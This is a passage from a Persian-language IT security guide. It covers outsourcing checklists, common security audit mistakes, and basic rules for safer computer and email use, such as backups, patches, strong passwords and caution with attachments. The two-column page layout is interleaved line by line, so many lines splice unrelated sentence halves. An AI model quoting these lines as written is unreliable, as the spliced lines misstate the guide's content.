‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ‬
‫ﺍﺛﺮﺑﺨﺸﻲ ﺍﻳﻦ ﺗﻼﺷﻬﺎ ﻧﻴﺰ ﻟﺤﻈﻪ ﺑﻪ ﻟﺤﻈﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﻧﻬﺎﻳﺘﹰﺎ ﺑﻪ ﺍﻳﻦ ﺍﻣﺮ ﻭﺍﻗﻔﻴﻢ ﻛﻪ ﭘﻴﭽﻴﺪﮔﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻧﻘﺎﻁ ﺿﻌﻒ ﺑﺮﻧﺎﻣﺔ ﺟـﺎﻣﻊ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ‬ ‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻛﻪ ﺑﺎ ﺭﺷﺪ ﻭ ﺗﻐﻴﻴﺮ ﺩﺭ ﻃﻮﻝ ﻋﻤﺮ ﺳﺎﺯﻣﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺧﺎﺭﺟﻲ ﻭﺍﺩﺍﺭ ﻛﻨﺪ‪ .‬ﺩﺭ ﻓﺼﻠﻲ ﻛﻪ ﺑﻪ ﺍﻳـﻦ‬ ‫ﻭ ﻳﺎ ﺑﻪ ﻫﺮ ﺗﺮﺗﻴﺐ ﻧﻤﻲﺗﻮﺍﻧﺴﺘﻪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺭﺍ ﺁﺷـﻜﺎﺭ‬
‫ﻣﻔﻬﻮﻡ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻧﻜﺎﺕ ﻗﺎﺑـﻞ ﺗﻮﺟـﻪ ﺩﺭ‬ ‫ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎﺯﺑﻴﻨﻲﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﻣﺰﻳﺖ ﺩﻳﮕـﺮ ﻧﻴـﺰ ﺑـﻪ ﻫﻤـﺮﺍﻩ‬
‫ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺖ ﻫﻤﻜﺎﺭ‪ ،‬ﭼﮕـﻮﻧﮕﻲ ﻣـﺪﻳﺮﻳﺖ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺁﻥ‪ ،‬ﻭ‬ ‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺁﻥ ﺍﻳﻨﻜـﻪ ﺍﮔـﺮ ﻣﺘﺨﻠﻔـﺎﻥ ﺑﺪﺍﻧﻨـﺪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ‬
‫ﺍﻳﻨﻜﻪ ﭼﻪ ﻫﻨﮕﺎﻡ ﺑﺎﻳﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﻧﺮﺍ ﺑﻪ ﺩﻗﺖ ﺯﻳـﺮ ﻧﻈـﺮ ﮔﺮﻓـﺖ‬ ‫ﺟﺴﺘﺠﻮﻱ ﺁﻧﺎﻥ ﻫﺴﺘﻴﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻓﻌﺎﻟﻴـﺖ ﺧـﻮﺩ ﺭﺍ ﻣﺤـﺪﻭﺩ‬
‫ﺑﺤﺚ ﻋﻤﻴﻘﻲ ﺻﻮﺭﺕ ﮔﺮﻓﺖ‪.‬‬ ‫ﻛﻨﻨﺪ‪.‬‬
‫ﻓﻬﺮﺳﺖ ﺍﻣﻨﻴﺖ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣﻨﺒـﻊ ﺩﻳﮕـﺮ ﺑـﺮﺍﻱ‬ ‫ﻣﻌﻤﻮﻝﺗﺮﻳﻦ ﺍﺷﺘﺒﺎﻫﺎﺗﻲ ﻛﻪ ﺑﺎ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻤﻴـﺰﻱ ﺍﻣﻨﻴـﺖ ﻗﺎﺑـﻞ‬
‫ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﺎﻳﻠﻨﺪ ﺍﺯ ﻳﻚ ﭘﻴﻤﺎﻧﻜـﺎﺭ ﺧـﺎﺭﺟﻲ ﺟﻬـﺖ ﺍﻧﺠـﺎﻡ‬ ‫ﺷﻨﺎﺳﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪:‬‬
‫ﻧﺼﺐ ﻧﺒﻮﺩﻥ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛‬ ‫•‬
‫ﻓﻬﺮﺳــﺖ ﻛﻨﺘــﺮﻝ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨــﺎﺑﻊ ﺧــﺎﺭﺟﻲ ﺩﺭ‬ ‫ﻣﺠﻮﺯ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺑﻪ ﻓﺎﻳﻠﻬﺎ؛‬ ‫•‬
‫ﺍﻣﻨﻴﺖ‪) ١٩٥‬ﻣﻼﺣﻈﺎﺕ ﻓﻨﻲ(‬ ‫ﺳﺎﺩﻩ ﻭ ﻗﺎﺑﻞ ﺣﺪﺱ ﺑﻮﺩﻥ ﺭﻣﺰ ﻋﺒﻮﺭ؛‬ ‫•‬

‫ﺁﻳﺎ ﺍﺗﺼﺎﻻﺕ ﻣﻴﺎﻥ ﺍﺭﺍﺋﻪﻛﻨﻨـﺪﮔﺎﻥ ﻭ ﻣـﺸﺘﺮﻳﺎﻥ )ﺍﺗـﺼﺎﻻﺕ‬ ‫•‬ ‫ﻓﻌﺎﻝ ﺑﻮﺩﻥ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻏﻴﺮﺿﺮﻭﺭﻱ؛ ﻭ‬ ‫•‬

‫ﺷﺒﻜﻪﻫﺎﻱ ﺧﺎﺭﺟﻲ( ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺑﺎﺯﺑﻴﻨﻲ ﻣـﻲﺷـﻮﺩ؟ ﻫـﺮ‬ ‫ﺭﻭﺷﻦ ﻧﺒﻮﺩﻥ ﻳﺎ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻥ ﻗﻮﺍﻧﻴﻦ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‪.‬‬ ‫•‬

‫ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟‬ ‫ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﻬﺖ ﺗﻌﻴﻴﻦ ﻳﻚ ﻣﺒﻨﺎ ﺑﺮﺍﻱ ﺑـﺎﺯﺑﻴﻨﻲﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ‪ -‬ﭼﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﺮﻛﺖ ﻭ ﭼﻪ ﺗﻮﺳﻂ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ‬
‫ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ‪ -‬ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬

‫‪ ۱۹۴‬ﻣﻨﺒﻊ‪ ،ITS :‬ﻓﺼﻞ ﻧﻬﻢ‪ ،‬ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻮﺭ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ‪ ،‬ﺹ ‪۱۳۳‬‬
‫‪ ۱۹۵‬ﻣﻨﺒﻊ‪ ،ITS :‬ﻓﺼﻞ ﻧﻬﻢ‪ ،‬ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻮﺭ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ‪ ،‬ﺹ ‪۱۳۳‬‬
‫‪٢٠٣‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺁﻳﺎ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﻭ ﻣﺸﺘﺮﻳﺎﻥ ﺑﻪ ﺷﺒﻜﺔ ﺷﻤﺎ‬ ‫•‬


‫ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪﻫﺎﻱ ﺧﺎﺭﺟﻲ‪ ،‬ﻳﻚ ﻣﻌﻤﺎﺭﻱ ﺭﺳﻤﻲ ﻭﺟﻮﺩ‬
‫ﺩﺍﺭﺩ؟‬
‫ﺁﻳﺎ ﻳﻚ ﺳﻴﺎﺳﺖ ﺭﺳﻤﻲ ﺑـﺮﺍﻱ ﺗﻌﻴـﻴﻦ ﺍﻳﻨﻜـﻪ ﺍﺗـﺼﺎﻝ ﺍﺯ‬ ‫•‬
‫ﺷﺒﻜﺔ ﺧﺎﺭﺟﻲ ﺩﺭ ﭼﻪ ﺯﻣﺎﻧﻲ‪ ،‬ﺗﺤﺖ ﭼﻪ ﺷـﺮﺍﻳﻄﻲ‪ ،‬ﻭ ﺑـﻪ‬
‫ﭼﻪ ﺻﻮﺭﺗﻲ ﻣﺠﺎﺯ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫ﺁﻳﺎ ﺁﻏﺎﺯ ﺷﺪﻥ ﻳﻚ ﺍﺗﺼﺎﻝ ﺍﺯ ﺷﺒﻜﻪ ﺧﺎﺭﺟﻲ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻳﻴﺪ‬ ‫•‬
‫ﻣﺪﻳﺮﻳﺖ ﺩﺍﺭﺩ؟‬
‫ﺁﻳﺎ ﭘﻴﺶ ﺍﺯ ﺍﺗﺼﺎﻝ ﻳﻚ ﺷـﺒﻜﺔ ﺧـﺎﺭﺟﻲ‪ ،‬ﺍﻧﺠـﺎﻡ ﻧـﻮﻋﻲ‬ ‫•‬
‫ﺑﺎﺯﺑﻴﻨﻲ ﺭﺳﻤﻲ ﺍﻟﺰﺍﻣﻲ ﺍﺳﺖ؟‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫‪٢٠٥‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺑﺮﺍﻱ ﺗﻬﻴﻪ ﻭ ﺫﺧﻴﺮﺓ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻳـﻚ‬ ‫‪.۳‬‬


‫ﻃﺮﺡ ﻣﺸﺮﻭﺡ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ‪ .‬ﺑﺎﻳـﺪ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤـﻞ‬
‫ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﻧﻴﺰ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺗـﺎ‬
‫ﺩﺭﺻﻮﺭﺕ ﺑﺮﻭﺯ ﻓﺠﺎﻳﻊ ﺟﺪﻱ ﻫﻢ ﺑﺘﻮﺍﻧﻴﺪ ﺳﻴﺴﺘﻢ ﺧـﻮﺩ ﺭﺍ‬
‫ﻣﺠﺪﺩﹰﺍ ﺑﺎﺯﺳﺎﺯﻱ ﻛﻨﻴﺪ‪.‬‬ ‫ﻓﺼﻞ ﺩﻭﺍﺯﺩﻫﻢ‬
‫ﺷﻜﺎﻙ ﻭ ﻛﻨﺠﻜﺎﻭ ﺑﺎﺷﻴﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺍﺗﻔﺎﻗﻲ ﺍﻓﺘﺎﺩ ﻛـﻪ‬ ‫‪.۴‬‬ ‫ﻗﻮﺍﻋﺪ ﺍﻳﻤﻨﻲ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺑﻪ ﻧﻈﺮ ﻏﻴﺮﻣﻌﻤﻮﻝ ﻣﻲﻧﻤﻮﺩ‪ ،‬ﺑﻪ ﻭﺟﻮﺩ ﻣﻬﺎﺟﻢ ﺷﻚ ﻛﻨﻴﺪ‬
‫ﻻ ﺩﺭ ﺧﻮﺍﻫﻴـﺪ‬
‫ﻭ ﺩﺭ ﺁﻥ ﻣﻮﺭﺩ ﺑﻪ ﺑﺮﺭﺳﻲ ﺑﭙﺮﺩﺍﺯﻳﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬ ‫ﺑﺮﺍﻱ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷﺮﻛﺘﻬﺎ‬
‫ﻳﺎﻓﺖ ﻛﻪ ﻣﺸﻜﻞ ﺍﺯ ﻳﻚ ﺍﺷـﺘﺒﺎﻩ ﻭ ﻳـﺎ ﻳـﻚ ﺍﺷـﻜﺎﻝ ﺩﺭ‬
‫ﺭﻭﺵ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻣﻨﺒﻊ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻣﺎ ﺑﺮﺧـﻲ ﻣﻮﺍﻗـﻊ‬ ‫ﭼﻬﺎﺭ ﮔﺎﻡ ﺁﺳﺎﻥ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﺔ ﺍﻣﻦﺗﺮ‬
‫ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﻜﻞ ﺟﺪﻱﺗﺮﻱ ﭘﻴﺪﺍ ﺷﻮﺩ‪ .‬ﺑﻪ ﻫﻤـﻴﻦ‬ ‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﻣﺴﺘﻠﺰﻡ ﺗﻼﺵ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ‬
‫ﺩﻟﻴﻞ ﻫﺮﮔﺎﻩ ﻣﺴﺌﻠﻪﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻗﺎﺩﺭ ﺑـﻪ ﺣﻼﺟـﻲ‬ ‫ﺍﺳﺖ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﺍﺕ ﻭ ﺗﺤﻠﻴـﻞ ﺳـﻮﺩ ﻭ‬
‫ﺩﻗﻴﻖ ﺁﻥ ﻧﻴﺴﺘﻴﺪ ﺑﺎﻳﺪ ﻧﺴﺒﺖ ﺑﻪ ﺍﻣﻨﻴﺘـﻲ ﺑـﻮﺩﻥ ﻣـﺸﻜﻞ‬ ‫ﺯﻳﺎﻥ ﻭﻗﺖ ﻛﺎﻓﻲ ﻧﺪﺍﺭﻳﺪ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ ﺩﺳﺖﻛﻢ ﭼﻬﺎﺭ ﻣﺮﺣﻠـﺔ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻣﻈﻨﻮﻥ ﺷﻮﻳﺪ ﻭ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﺩﻗﻴﻖ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬ ‫ﺳﺎﺩﺓ ﺯﻳﺮ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﻴﺪ‪:‬‬

‫ﺑﻴﺴﺖ ﻭ ﭘﻨﺞ ﻗﺎﻋﺪﺓ ﺧﺎﺹ ﺩﻳﮕﺮ‬ ‫ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﺍﺩﺍﺭﺓ ﺷـﻤﺎ‬ ‫‪.۱‬‬
‫ﻭﺍﺟﺪ ﭼﻪ ﺩﺭﺟﻪﺍﻱ ﺍﺯ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﻓﻜـﺮ‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻳﻤﻦﺗﺮ ﺍﺯ ﺭﺍﻳﺎﻧﻪ‬
‫ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺎﻻﻳﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺍﺳـﺖ ﻭ‬
‫ﻗﺎﻋﺪﺓ ‪ .۱‬ﭘــﻴﺶ ﺍﺯ ﻭﻗــﻮﻉ ﺳــﺮﻗﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺩﺭ ﻣــﻮﺭﺩ ﺁﻥ‬ ‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺩﭼﺎﺭ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ‬
‫ﺑﻴﺎﻧﺪﻳﺸﻴﺪ‪.‬‬ ‫ﺧﻮﺍﻫﻴﺪ ﺷﺪ‪ ،‬ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﺍﻣﻨﻴﺖ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻭﻟﻮﻳـﺖ ﻛـﺎﻓﻲ‬
‫ﻗﺎﻋﺪﺓ ‪ .۲‬ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ ﻭ ﻣﻄﻤـﺌﻦ‬ ‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑـﺮﻭﺯ ﻣـﺸﻜﻼﺕ‬
‫ﺷﻮﻳﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﻬﺪﻳﺪ ﻓﻴﺰﻳﻜﻲ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺑـﻪ ﺁﻧﻬـﺎ‬ ‫ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺲ ﭘﺮﻛـﺎﺭ ﻛـﻪ ﻫـﻴﭻ ﺁﻣـﻮﺯﺵ‬
‫ﺁﺳﻴﺒﻲ ﻭﺍﺭﺩ ﻧﻤﻲﺷﻮﺩ ﻭ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬ ‫ﺭﺳﻤﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﻧﺪﻳﺪﻩ ﺍﺳﺘﻔﺎﺩﺓ ﭘﺎﺭﻩﻭﻗـﺖ ﻛﻨﻴـﺪ‪،‬‬
‫ﺑﺪﻭﻥ ﺷﻚ ﺑﻪ ﺍﺳﺘﻘﺒﺎﻝ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﻓﺘﻪﺍﻳﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۳‬ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﺍﻧﺘﺨــﺎﺏ ﻛﻨﻴــﺪ ﻛــﻪ‬
‫ﺑﺴﺎﺩﮔﻲ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﻳـﺎﺩ ﺑﻴﺎﻭﺭﻳـﺪ ﺍﻣـﺎ ﺣـﺪﺱ‬ ‫ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺭﺍ ﺁﻣﻮﺯﺵ ﻭ ﺩﺭ ﺗـﺪﻭﻳﻦ ﺭﻭﺍﻟﻬـﺎ‬ ‫‪.۲‬‬
‫ﺯﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﻣﺸﻜﻞ ﺑﺎﺷﺪ‪.‬‬ ‫ﺩﺧﺎﻟﺖ ﺩﻫﻴﺪ‪ .‬ﺁﻳـﺎ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺩﺍﺭﺓ ﺷـﻤﺎ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺿﻌﻒ ﺍﻣﻨﻴﺘـﻲ )ﻭ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﻋﻤﻠﻜﺮﺩﻫـﺎﻳﻲ ﺍﺯ ﻧﻈـﺮ‬
‫ﻗﺎﻋﺪﺓ ‪ .۴‬ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺧﻮﺩ ﺭﺍ ﻫﻤﻮﺍﺭﻩ‬
‫ﺍﻣﻨﻴﺘﻲ ﺿﻌﻴﻒ ﻫﺴﺘﻨﺪ( ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧـﺪ؟ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺭﺻـﻮﺭﺕ‬
‫ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ‪.‬‬
‫ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﻣﻮﺭﺩ ﻏﻴﺮﻋﺎﺩﻱ ﻳﺎ ﻣﺸﻜﻮﻙ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻨﺪ ﻛﻪ‬
‫ﻗﺎﻋﺪﺓ ‪ .۵‬ﺑﺮﻧﺎﻣــﺔ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺧــﻮﺩ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ‬ ‫ﭼﻪ ﻛﻨﻨﺪ ﻭ ﺑﺎ ﭼﻪ ﻛﺴﻲ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻧﺪ‪ .‬ﺗﻬﻴﺔ ﻳﻚ ﺑﺮﻧﺎﻣﺔ‬
‫ﭘﻴﻜﺮﺑﻨــﺪﻱ ﻛﻨﻴــﺪ ﻛــﻪ ﺿــﻤﻴﻤﻪﻫــﺎ‪ ١٩٦‬ﺭﺍ ﺑــﺼﻮﺭﺕ‬ ‫ﺁﻣﻮﺯﺷﻲ ﻣﻨﺎﺳﺐ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﻣـﻲﺗﻮﺍﻧـﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ‬
‫ﺧﻮﺩﻛﺎﺭ ﺑﺎﺯ ﻧﻜﻨﺪ‪.‬‬ ‫ﻗﺴﻤﺘﻲ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺗـﺪﺍﻓﻌﻲ ﺷـﻤﺎ ﺗﺒـﺪﻳﻞ ﻛﻨـﺪ‪ .‬ﻧﺎﺁﮔـﺎﻩ‬
‫ﻗﺎﻋﺪﺓ ‪ .۶‬ﻗﺒﻞ ﺍﺯ ﺑﺎﺯ ﻛﺮﺩﻥ ﻫﺮ ﻧﻮﻉ ﺿﻤﻴﻤﺔ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪،‬‬ ‫ﻧﮕﻬﺪﺍﺷﺘﻦ ﻛﺎﺭﺑﺮﺍﻥ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎ ﻭ ﻋﻤﻠﻜـﺮﺩ‬
‫ﺑﻪ ﻧﺎﻡ ﺁﻥ ﺩﻗﺖ ﻛﻨﻴﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻳـﻚ‬ ‫ﺳﻴﺴﺘﻢ ﺑﺎﻋﺚ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ ﻧﻤﻲﮔﺮﺩﺩ؛ ﭼﺮﺍﻛﻪ ﻫﻤـﻮﺍﺭﻩ‬
‫ﺑﺮﻧﺎﻣﺔ ﺍﺟﺮﺍﻳﻲ ﻧﻴﺴﺖ‪.‬‬ ‫ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻳﮕـﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﻣﺼﻤﻢ ﺑﺎﺷﺪ‪.‬‬

‫‪196 Attachment‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٠٦‬‬

‫ﻗﺎﻋﺪﺓ ‪ .۱۵‬ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳـﻞ‪ ١٩٩‬ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﻛﻨﻴـﺪ‪ ،‬ﺁﻧـﺮﺍ‬ ‫ﻗﺎﻋﺪﺓ ‪ .۷‬ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺿﻤﻴﻤﻪﺍﻱ ﺭﺍ ﻛﻪ ﺍﺯ ﻳﻚ ﻏﺮﻳﺒﻪ ﺩﺭﻳﺎﻓﺖ‬
‫ﻏﻴﺮﻓﻌــﺎﻝ ﻛﻨﻴــﺪ‪ .‬ﺍﮔــﺮ ﺍﺯ ﺍﺷــﺘﺮﺍﻙ ﻓﺎﻳــﻞ ﺍﺳــﺘﻔﺎﺩﻩ‬ ‫ﻛﺮﺩﻩ ﺍﻳﺪ ﺑﺎﺯ ﻧﻜﻨﻴﺪ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻓﺎﻳـﻞ‬
‫ﻣــﻲﻛﻨﻴــﺪ‪ ،‬ﻧﺎﻣﻬــﺎﻱ ﻛــﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ‬ ‫ﻣﺮﺑﻮﻃﻪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺑﺎﺷﺪ‪.‬‬
‫ﻣﺴﺘﺤﻜﻢ ﺑﺮﮔﺰﻳﻨﻴـﺪ ﻭ ﻣﺠﻮﺯﻫـﺎﻱ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺗـﺎ‬
‫ﻗﺎﻋﺪﺓ ‪ .۸‬ﺍﺯ ﮔﺸﻮﺩﻥ ﺿﻤﻴﻤﻪﺍﻱ ﻛﻪ ﺍﺯ ﻃﺮﻑ ﻳﻚ ﻓﺮﺩ ﺁﺷـﻨﺎ ﻭ‬
‫ﺣﺪﺍﻗﻞ ﻣﻤﻜﻦ ﻛﻪ ﻫﻤﭽﻨﺎﻥ ﺍﻣﻜﺎﻥ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣـﻮﺭﺩ‬
